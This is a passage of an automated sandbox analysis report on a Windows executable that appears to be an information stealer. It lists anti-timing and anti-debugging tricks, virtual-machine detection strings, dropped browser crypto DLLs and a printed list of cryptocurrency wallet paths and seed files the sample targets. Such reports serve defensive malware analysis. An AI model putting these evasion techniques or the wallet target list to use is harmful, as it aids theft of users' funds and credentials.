Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07AA second address: 4CA07D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDFF9160A37h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07D8 second address: 4CA07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov dx, 1466h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c inc edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA07EB second address: 4CA0801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0801 second address: 4CA0877 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov dl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test al, al 0x0000000c jmp 00007FDFF8F79164h 0x00000011 jne 00007FE069BF13B4h 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FDFF8F79168h 0x00000022 or si, A8C8h 0x00000027 jmp 00007FDFF8F7915Bh 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 popad 0x00000031 mov ecx, edx 0x00000033 jmp 00007FDFF8F79162h 0x00000038 shr ecx, 02h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0877 second address: 4CA087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA087B second address: 4CA0881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0881 second address: 4CA0904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rep movsd 0x0000000e rep movsd 0x00000010 rep movsd 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 pushad 0x00000017 push edi 0x00000018 pushfd 0x00000019 jmp 00007FDFF9160A32h 0x0000001e add cx, 38B8h 0x00000023 jmp 00007FDFF9160A2Bh 0x00000028 popfd 0x00000029 pop eax 0x0000002a pushad 0x0000002b call 00007FDFF9160A2Fh 0x00000030 pop eax 0x00000031 call 00007FDFF9160A39h 0x00000036 pop esi 0x00000037 popad 0x00000038 popad 0x00000039 mov ecx, edx 0x0000003b jmp 00007FDFF9160A37h 0x00000040 and ecx, 03h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov edi, ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0904 second address: 4CA0933 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, cx 0x00000009 popad 0x0000000a rep movsb 0x0000000c jmp 00007FDFF8F79166h 0x00000011 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0933 second address: 4CA0937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0937 second address: 4CA093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA093D second address: 4CA0983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b jmp 00007FDFF9160A30h 0x00000010 mov ecx, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDFF9160A37h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0983 second address: 4CA09D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007FDFF8F7915Fh 0x0000001b jmp 00007FDFF8F79163h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09D1 second address: 4CA09E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDFF9160A34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09E9 second address: 4CA09ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA09ED second address: 4CA0A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jmp 00007FDFF9160A37h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 pushfd 0x00000012 jmp 00007FDFF9160A2Bh 0x00000017 add cx, DADEh 0x0000001c jmp 00007FDFF9160A39h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 pushfd 0x00000024 jmp 00007FDFF9160A31h 0x00000029 sub al, 00000016h 0x0000002c jmp 00007FDFF9160A31h 0x00000031 popfd 0x00000032 popad 0x00000033 pop esi 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDFF9160A2Ch 0x0000003b xor ch, 00000038h 0x0000003e jmp 00007FDFF9160A2Bh 0x00000043 popfd 0x00000044 push eax 0x00000045 push edx 0x00000046 movzx esi, dx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0A87 second address: 4CA0ABE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop esi 0x0000000c mov dx, CF98h 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FDFF8F79161h 0x00000017 jmp 00007FDFF8F7915Bh 0x0000001c popfd 0x0000001d popad 0x0000001e leave 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0ABE second address: 4CA0AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0AC4 second address: 4CA0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C21 second address: 4CA0C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C25 second address: 4CA0C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDFF8F7915Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C3C second address: 4CA0C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C58 second address: 4CA0C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C5E second address: 4CA0C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDFF9160A31h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: 4CA0C80 second address: 4CA0C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: 93F89F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: 93F964 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: ADFB40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: AE96D6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Special instruction interceptor: First address: B6A573 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe TID: 1476 Thread sleep time: -36018s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe TID: 3176 Thread sleep time: -48024s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C4EC930
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: CFIEGDAE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: CFIEGDAE.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: CFIEGDAE.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: CFIEGDAE.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: CFIEGDAE.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: CFIEGDAE.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: CFIEGDAE.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: CFIEGDAE.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: CFIEGDAE.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: CFIEGDAE.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: CFIEGDAE.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: CFIEGDAE.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: CFIEGDAE.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: CFIEGDAE.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: CFIEGDAE.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: CFIEGDAE.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: CFIEGDAE.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFIEGDAE.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: CFIEGDAE.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: NTICE
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: SICE
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe File opened: SIWVID
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C535FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C535FF0
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C50B66C
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C50B1F7
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2466503871.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: EPProgram Manager
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C50B341 cpuid 0_2_6C50B341
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe Code function: 0_2_6C4D35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4D35A0

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000000.00000002.2466300957.00000000006F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2074987962.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: h4ZgewNxoj.exe PID: 3376, type: MEMORYSTR
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*J
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum\wallets\\*.*J
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
